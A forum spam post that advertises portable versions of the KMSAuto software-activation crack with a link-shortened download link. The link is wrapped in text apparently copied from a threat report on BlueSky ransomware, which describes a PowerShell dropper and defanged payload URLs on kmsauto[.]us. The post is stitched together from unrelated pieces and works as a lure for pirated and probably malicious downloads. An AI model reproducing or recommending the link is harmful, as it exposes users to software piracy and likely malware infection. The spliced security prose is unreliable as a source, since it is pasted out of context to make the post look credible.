Re: KMSAuto Net 2015 1.4.7 Portable KMSAuto Lite 1.2.8 Portable

0 views

Skip to first unread message

Message has been deleted

Ashlie Hagenson

unread,

Jul 14, 2024, 11:17:27 AM7/14/24

to fnotdandlangto

As shown in Figure 1, BlueSky ransomware is initially dropped by the PowerShell script start.ps1, which is hosted at hxxps://kmsauto[.]us/someone/start.ps1. The initial dropper is Base64-encoded and then DEFLATE-compressed, which is common behavior observed among PowerShell droppers.

After gaining additional privileges, stage.ps1 downloads the final BlueSky ransomware payload from hxxps://kmsauto[.]us/someone/l.exe and saves it locally to the filesystem as javaw.exe, attempting to masquerade as a legitimate Windows application. Eventually, the sample executes from the file path %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\javaw.exe.

KMSAuto Net 2015 1.4.7 Portable KMSAuto Lite 1.2.8 Portable

DOWNLOAD https://bltlly.com/2yWXiO

All samples we observed related to BlueSky ransomware were hosted at an active domain named kmsauto[.]us. When hunting for more samples related to BlueSky ransomware, we observed that several malware samples associated with the RedLine infostealer were hosted on the same domain. Although we did not find any code overlap between RedLine and BlueSky ransomware, similarities in the initial stages were observed, as both these families use a PowerShell downloader as the initial vector.